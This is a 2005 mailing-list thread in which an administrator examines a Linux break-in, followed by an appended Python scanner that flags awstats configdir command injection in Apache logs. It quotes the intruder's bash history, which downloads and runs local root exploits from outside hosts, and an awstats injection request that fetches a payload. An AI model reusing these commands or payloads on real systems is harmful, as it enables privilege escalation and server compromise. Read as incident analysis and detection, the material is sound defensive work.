Patched kernel still vulnerable!? (was Re: Hacked...) 2005-03-09 - By Aviram Carmi
Hi all,
As I was tracking down what happened to my machine, I followed up and researched the first few commands that were in the .bash_history:
cd /var/tmp
wget http://www.albany-toyota.co.nz/release/elflbl
chmod 777 elflbl
./elflbl
id
./elflbl -n3
id
./elflbl -f switch
id
wget http://www.freewebs.com/swcbreaker/xpl/uselib24
chmod 777 uselib24
./uselib24
From what I was able to find, elflbl exploits a vulnerability in uselib which was supposedly fixed on Jan 17, and which I installed on Jan 20. The first traces of the break-in were on Feb 12 (even though the log file shows awstats hacked on Mar 5???)
https://rhn.redhat.com/network/errata/details/index.pxt?eid=2656
> RHSA-2005:043 - Security Advisory
>
> * Details
> * Packages
> * Affected Systems
>
> Synopsis
> Updated kernel packages fix security vulnerabilities
>
> Issued: 2005-01-17
> Updated: 2005-01-17
> Topic
> Updated kernel packages that fix several security issues in Red Hat
> Enterprise Linux 3 are now available.
> Description
> The Linux kernel handles the basic functions of the operating system.
>
> This advisory includes fixes for several security issues:
>
> iSEC Security Research discovered a VMA handling flaw in the uselib(2)
> system call of the Linux kernel. A local user could make use of this
> flaw to gain elevated (root) privileges. The Common Vulnerabilities and
> Exposures project (cve.mitre.org) has assigned the name CAN-2004-1235 to
> this issue.
So... is there still a security hole in the kernel that elflbl exploits?
I have a copy of the elflbl executable (and of the uselib24) if they are not available from the above URLs.
BTW,
I installed mod_security http://www.modsecurity.org/ with rules from http://www.gotroot.com/mod_security+rules
and upgraded awstats to the latest version...
and as I mentioned previously, wget, curl, lynx and telnet are all aliased to this little shell script (the originals renamed so I can use them in my scripts)
{
  echo "$0" "$@"          # which wrapper was called, and with what arguments
  echo ps;  ps -egxuwc    # process list at the time of the call
  echo who; who -aH       # who is logged in
  echo set; set           # environment and shell variables of the caller
  echo
} | mail -s "$0" myemail@(protected)
so that I am informed of any unauthorized use of wget/curl/lynx/telnet
I still do not have a firewall configured, since I am still not quite sure how to allow the needed services. For example, I have a backup client program (Dantz Retrospect) and a FileMaker Pro server running on the system, which use their well known ports, but when doing lsof it shows that there are other ports in use by these, so I am not sure exactly how to do this... I've asked before, and got some answers, but did not really follow up and install/configure the firewall...
-avi
At 22:45 -0800 03/08/2005, Aviram Carmi wrote:
> Thanks,
>
> it was awstats:
>
> 200.175.36.178 - - [05/Mar/2005:19:48:35 -0800] "GET
> /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/var/tmp;
> %20%20wget%20http://paginas.terra.com.br/informatica/swcrew/r0nin%20;echo%20__fim__;echo%20|
> HTTP/1.1" 200 598 "-" "-"
>
> -avi
>
> At 00:28 -0600 03/09/2005, Thomas Cameron wrote:
>> Look in /var/log/http/*. I am betting that there is something in
>> one of the logs (probably error_log) that will catch your eye.
>>
>> You're running something PHP-ish, aren't you? Or maybe awstats?
>>
>> Thomas
--
Aviram Carmi Owner Executive Vice President, Technology
Over TheNet (R) 601 Daily Drive Suite #226 Camarillo, CA 93010-5840
http://www.otn.com/ Building Profitable Web Sites Today (805) 384-1144 Voice (805) 384-9111 FAX
(C) Copyright 2004, Over TheNet (R) All rights reserved.
-- Taroon-list mailing list Taroon-list@(protected) http://www.redhat.com/mailman/listinfo/taroon-list
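A check a defender can run over the Apache access logs for the awstats configdir injection visible in the log line quoted in the thread, as an added example (not code from the original post or from the awstats or mod_security projects). The sample log lines are constructed; the first is modelled on the quoted request with the download host replaced by a placeholder.

```python
import re
from urllib.parse import unquote

# Apache access log (common/combined format): client ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})')
# Shell metacharacters that have no business inside a directory name.
SHELL_META = re.compile(r'[|;`$]')

def decode_request(raw):
    """URL-decode twice: the payload is %20-encoded, and double encoding is a common filter dodge."""
    return unquote(unquote(raw))

def is_awstats_cmd_injection(line):
    """Return (client ip, decoded request) when an access log line looks like an
    awstats.pl configdir command injection, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = decode_request(m.group('request'))
    if 'awstats.pl' not in req.lower():
        return None
    q = re.search(r'[?&]configdir=([^&\s]*)', req, re.IGNORECASE)
    if q is None or not SHELL_META.search(q.group(1)):
        return None
    return m.group('ip'), req

def scan(lines):
    """Return every hit from an iterable of access log lines."""
    return [hit for hit in map(is_awstats_cmd_injection, lines) if hit]

# Constructed sample log: line 0 is modelled on the request quoted in the thread (download
# host replaced by a placeholder); then benign traffic and one double-encoded variant.
SAMPLE_LOG = [
    '200.175.36.178 - - [05/Mar/2005:19:48:35 -0800] "GET /awstats//awstats.pl?configdir=|echo%20;'
    'echo%20__comeco__;%20cd%20/var/tmp;%20%20wget%20http://example.invalid/r0nin%20;echo%20__fim__;'
    'echo%20| HTTP/1.1" 200 598 "-" "-"',
    '10.0.0.5 - - [05/Mar/2005:20:01:10 -0800] "GET /awstats/awstats.pl?config=otn.com&output=main'
    ' HTTP/1.1" 200 12345 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [05/Mar/2005:20:02:00 -0800] "GET /awstats/awstats.pl?configdir=/etc/awstats'
    '&config=otn.com HTTP/1.1" 200 12345 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [05/Mar/2005:20:03:00 -0800] "GET /index.html HTTP/1.1" 200 4096 "-" "-"',
    '200.175.36.200 - - [05/Mar/2005:21:00:00 -0800] "GET /awstats/awstats.pl?configdir=%257Cid%2520'
    ' HTTP/1.1" 200 598 "-" "-"',
]

if __name__ == '__main__':
    for ip, req in scan(SAMPLE_LOG):
        print(f'{ip}: {req}')
```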